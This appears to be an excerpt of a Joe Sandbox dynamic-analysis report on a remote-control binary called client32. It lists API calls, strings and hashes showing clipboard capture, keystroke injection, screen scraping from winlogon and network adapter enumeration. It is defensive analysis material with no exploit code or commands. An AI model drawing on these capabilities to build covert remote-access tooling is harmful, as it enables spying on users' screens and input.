                                                                                  • Part of subcall function 11091B00: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11091B6B
                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 11093555
                                                                                  • Part of subcall function 110919C0: GlobalDeleteAtom.KERNEL32(00000000), ref: 110919FE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessageWindow$AtomCreateEventGlobalTranslate$AcceleratorClassCloseDeleteDispatchExceptionFilterFindForegroundHandleInfoOpenUnhandledUpdate_malloc_memsetwsprintf
                                                                                • String ID: NSMClassList$NSMFindClassEvent
                                                                                • API String ID: 1622498684-2883797795
                                                                                • Opcode ID: 1d17c6d06f0752a0e127f38c2cb7496eef9d81b3bf4849528fd07608f0b17edd
                                                                                • Instruction ID: 4b33314c0ec69eaaabe86fb2bb0f057967e6cef17922574bfca5772aa51aa607
                                                                                • Opcode Fuzzy Hash: 1d17c6d06f0752a0e127f38c2cb7496eef9d81b3bf4849528fd07608f0b17edd
                                                                                • Instruction Fuzzy Hash: E911C639F4822D67EB15A3F51D29B9FBA985B44BA8F010024F92DDA580EF64F400E6A5
                                                                                APIs
                                                                                • IsClipboardFormatAvailable.USER32(?), ref: 11033361
                                                                                • GetClipboardData.USER32(?), ref: 1103337D
                                                                                • GetClipboardFormatNameA.USER32(?,?,00000050), ref: 110333FC
                                                                                • GetLastError.KERNEL32 ref: 11033406
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 11033426
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Clipboard$Format$AvailableDataErrorGlobalLastNameUnlock
                                                                                • String ID: ..\ctl32\clipbrd.cpp$pData && pSize
                                                                                • API String ID: 1861668072-1296821031
                                                                                • Opcode ID: f2492e8139006f9da97ffff361a7bd75bee4125508335d11334c914ee87c47b7
                                                                                • Instruction ID: bd08247f7f5b97daa22515b1f99226a4dce8a406111026209efe1a9e37a97f87
                                                                                • Opcode Fuzzy Hash: f2492e8139006f9da97ffff361a7bd75bee4125508335d11334c914ee87c47b7
                                                                                • Instruction Fuzzy Hash: 8121D336E1415D9FC701DFE998C1AAEF3B8EF8961AB0040A9E815DF300EF71A900CB90
                                                                                APIs
                                                                                • FindResourceA.KERNEL32(00000000,00001770,0000000A), ref: 1108946F
                                                                                • LoadResource.KERNEL32(00000000,00000000,?,00000000,?,110CF1A6,?), ref: 11089484
                                                                                • LockResource.KERNEL32(00000000,?,00000000,?,110CF1A6,?), ref: 110894B6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Resource$FindLoadLock
                                                                                • String ID: ..\ctl32\Errorhan.cpp$hMap
                                                                                • API String ID: 2752051264-327499879
                                                                                • Opcode ID: 4b4fe2a71f7d748f02518d03cf39b1b5f1061245372e77ab65800b9219663b1a
                                                                                • Instruction ID: 3c24799b714a192eacab9213173f85fc7e3b9246bd1fd21045fe874d5ce20fb5
                                                                                • Opcode Fuzzy Hash: 4b4fe2a71f7d748f02518d03cf39b1b5f1061245372e77ab65800b9219663b1a
                                                                                • Instruction Fuzzy Hash: BD11DA39E4937666D712EAFE9C44B7AB7D8ABC07A8B014471FC69E3540FB20D450C7A1
                                                                                APIs
                                                                                Strings
                                                                                • nc->cmd.mouse.nevents < NC_MAXEVENTS, xrefs: 111133D9
                                                                                • ..\ctl32\Remote.cpp, xrefs: 111133D4
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountIconicTick
                                                                                • String ID: ..\ctl32\Remote.cpp$nc->cmd.mouse.nevents < NC_MAXEVENTS
                                                                                • API String ID: 1307367305-2838568823
                                                                                • Opcode ID: fccd6ed02a63c9ea5242b78adbaa7ba576b571540b65b10685f4287bd127c7f7
                                                                                • Instruction ID: cb75b6c9c213d9e442ee644175f48350251445db3f236d69570c6cf200ac5b3b
                                                                                • Opcode Fuzzy Hash: fccd6ed02a63c9ea5242b78adbaa7ba576b571540b65b10685f4287bd127c7f7
                                                                                • Instruction Fuzzy Hash: 11018135AA8B528AC725CFB0C9456DAFBE4AF04359F00443DE49F86658FB24B082C70A
                                                                                APIs
                                                                                • IsIconic.USER32(000000FF), ref: 110C10AD
                                                                                • ShowWindow.USER32(000000FF,00000009,?,1105E793,00000001,00000001,?,00000000), ref: 110C10BD
                                                                                • BringWindowToTop.USER32(000000FF), ref: 110C10C7
                                                                                • GetCurrentThreadId.KERNEL32 ref: 110C10E8
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Window$BringCurrentIconicShowThread
                                                                                • String ID:
                                                                                • API String ID: 4184413098-0
                                                                                • Opcode ID: 9cd2ccb7cdf78e839ebc1708f3911b6b440f138af10aef91ba48fa7e682de2eb
                                                                                • Instruction ID: 84533db14937db9444e2f7c69536c5845b28cc0232cb9748846df38ed0837754
                                                                                • Opcode Fuzzy Hash: 9cd2ccb7cdf78e839ebc1708f3911b6b440f138af10aef91ba48fa7e682de2eb
                                                                                • Instruction Fuzzy Hash: 1731CD3AA00315DBDB14DE68D48079ABBA8AF48754F1540BAFC169F246CBB5E845CFE0
                                                                                APIs
                                                                                • DeviceIoControl.KERNEL32(?,00000101,?,00000001,00000000,00000000,?,00000000), ref: 111131E2
                                                                                • keybd_event.USER32(00000091,00000046,00000000,00000000), ref: 11113215
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ControlDevicekeybd_event
                                                                                • String ID:
                                                                                • API String ID: 1421710848-0
                                                                                • Opcode ID: 9865bf64858dfd4b5ae79e364b4789db47783bc591ded0e092dc9763c4139b7b
                                                                                • Instruction ID: d69eaa5760cfcdb7a6e8037c3782fd2f7db196db4b5aaba7e7bab0ff0a721f20
                                                                                • Opcode Fuzzy Hash: 9865bf64858dfd4b5ae79e364b4789db47783bc591ded0e092dc9763c4139b7b
                                                                                • Instruction Fuzzy Hash: E4012432F55A1539F30489B99E45FE7FA2CAB40721F014278EE59AB2C8DAA09904C6A0
                                                                                APIs
                                                                                • GetClipboardFormatNameA.USER32(?,?,00000050), ref: 110335F6
                                                                                • SetClipboardData.USER32(00000000,00000000), ref: 11033612
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Clipboard$DataFormatName
                                                                                • String ID:
                                                                                • API String ID: 3172747766-0
                                                                                • Opcode ID: e17e0e6aed767a58da8d411b70808350d70cb6dd51a63046c179038dcd941cc4
                                                                                • Instruction ID: d021e7b1abaf81fd48200924965e9797cc36530c630056afc83bc75e16402c3f
                                                                                • Opcode Fuzzy Hash: e17e0e6aed767a58da8d411b70808350d70cb6dd51a63046c179038dcd941cc4
                                                                                • Instruction Fuzzy Hash: 6701D830D2E124AEC714DF608C8097EB7ACEF8960BB018556FC419A380EF29A601D7F6
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Library$_memset$AddressFreeLoadProcwsprintf$_malloc
                                                                                • String ID: %02x%02x%02x%02x%02x%02x$%d adapters in chain, %d adapters by size$* $3$CLTCONN.CPP$GetAdaptersInfo$IPHLPAPI.DLL$Info. Netbios macaddr=%s$Info. Set MacAddr to %s$Info. Unable to load netapi32$Info. macaddr[%d]=%s, ipaddr=%hs/%hs$ListenAddress$Netbios$TCPIP$VIRTNET$Warning. Netbios() returned x%x$netapi32.dll$pGetAdaptersInfo
                                                                                • API String ID: 2942389153-3574733319
                                                                                • Opcode ID: cf2d16c8c97f05e0515526d6f1a9da3da889a5d61ab08703c0b3442b7c36f74d
                                                                                • Instruction ID: 9380186eaa86aba5e78307d08d1cef0eec38285017acdf678952b44c5cd5fdba
                                                                                • Opcode Fuzzy Hash: cf2d16c8c97f05e0515526d6f1a9da3da889a5d61ab08703c0b3442b7c36f74d
                                                                                • Instruction Fuzzy Hash: 60E13A75D1429A9FEB17CB648C90BEEBBF96F85305F4400D9E858B7240E630AB44CF61
                                                                                APIs
                                                                                • OpenEventA.KERNEL32(00100000,00000000,Client32DIBQuit), ref: 110B3130
                                                                                • OpenEventA.KERNEL32(00100000,00000000,Client32DIBBlit), ref: 110B3141
                                                                                • OpenEventA.KERNEL32(00000002,00000000,Client32DIBDone), ref: 110B314F
                                                                                • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,000000FA), ref: 110B3183
                                                                                • OpenFileMappingA.KERNEL32(000F001F,00000000,Client32DIB), ref: 110B31A6
                                                                                • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 110B31C2
                                                                                • GetDC.USER32(00000000), ref: 110B31E8
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 110B31FC
                                                                                • CreateDIBSection.GDI32(00000000,00000004,00000000,?,?,?), ref: 110B321F
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 110B3236
                                                                                • GetTickCount.KERNEL32 ref: 110B323F
                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 110B3276
                                                                                • GetTickCount.KERNEL32 ref: 110B327F
                                                                                • GetLastError.KERNEL32(00000000), ref: 110B328E
                                                                                • GdiFlush.GDI32 ref: 110B32A2
                                                                                • SelectObject.GDI32(00000000,?), ref: 110B32AD
                                                                                • DeleteObject.GDI32(00000000), ref: 110B32B4
                                                                                • SetEvent.KERNEL32(?), ref: 110B32BE
                                                                                • DeleteDC.GDI32(00000000), ref: 110B32C8
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 110B32D4
                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 110B32DE
                                                                                • CloseHandle.KERNEL32(00000000), ref: 110B32E5
                                                                                • CloseHandle.KERNEL32(00000000), ref: 110B3309
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EventOpen$FileObject$CloseCountCreateDeleteHandleSelectTickView$CompatibleErrorFlushLastMappingMultipleObjectsReleaseSectionUnmapWait
                                                                                • String ID: Client32DIB$Client32DIBBlit$Client32DIBDone$Client32DIBQuit$ERROR %d blitting from winlogon, took %d ms$ScrapeApp
                                                                                • API String ID: 2071925733-2101319552
                                                                                • Opcode ID: 69ccdf57648ba78fab6be258752d8ad5ba147c4fba19d096890e8e9156bf9cf5
                                                                                • Instruction ID: 4116a02b123aa608432531ba698621a05075ff29bb652617cbc71955754d1d1a
                                                                                • Opcode Fuzzy Hash: 69ccdf57648ba78fab6be258752d8ad5ba147c4fba19d096890e8e9156bf9cf5
                                                                                • Instruction Fuzzy Hash: A9518679E40229ABDB14CFE4CD89F9EBBB4FB48704F104064F921AB644D774A900CB65
                                                                                APIs
                                                                                  • Part of subcall function 1105E950: __itow.LIBCMT ref: 1105E975
                                                                                • GetObjectA.GDI32(?,0000003C,?), ref: 110054E5
                                                                                  • Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
                                                                                  • Part of subcall function 11110230: _memset.LIBCMT ref: 11110262
                                                                                • wsprintfA.USER32 ref: 1100553D
                                                                                • DeleteObject.GDI32(?), ref: 11005592
                                                                                • DeleteObject.GDI32(?), ref: 1100559B
                                                                                • SelectObject.GDI32(?,?), ref: 110055B2
                                                                                • DeleteObject.GDI32(?), ref: 110055B8
                                                                                • DeleteDC.GDI32(?), ref: 110055BE
                                                                                • SelectObject.GDI32(?,?), ref: 110055CF
                                                                                • DeleteObject.GDI32(?), ref: 110055D8
                                                                                • DeleteDC.GDI32(?), ref: 110055DE
                                                                                • DeleteObject.GDI32(?), ref: 110055EF
                                                                                • DeleteObject.GDI32(?), ref: 1100561A
                                                                                • DeleteObject.GDI32(?), ref: 11005638
                                                                                • DeleteObject.GDI32(?), ref: 11005641
                                                                                • ShowWindow.USER32(?,00000009), ref: 1100566F
                                                                                • PostQuitMessage.USER32(00000000), ref: 11005677
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Object$Delete$Select$MessagePostQuitShowWindow__itow_malloc_memsetwsprintf
                                                                                • String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$FillColour$FillStyle$Font$PenColour$PenStyle$PenWidth$Tool
                                                                                • API String ID: 2789700732-770455996
                                                                                • Opcode ID: fa30a8fc88e828b2b41ce521f9f081a77df99f407f500f9b6b47d79f574b6951
                                                                                • Instruction ID: fd76b8300a222304a99732cac27ba94327f80de35dfbaf81c148901aa75ffadf
                                                                                • Opcode Fuzzy Hash: fa30a8fc88e828b2b41ce521f9f081a77df99f407f500f9b6b47d79f574b6951
                                                                                • Instruction Fuzzy Hash: 24813775600609AFD368DBA5CD91EABF7F9BF8C704F00494DE5AAA7241CA74F801CB60
                                                                                APIs
                                                                                • BeginPaint.USER32(?,?), ref: 1101586F
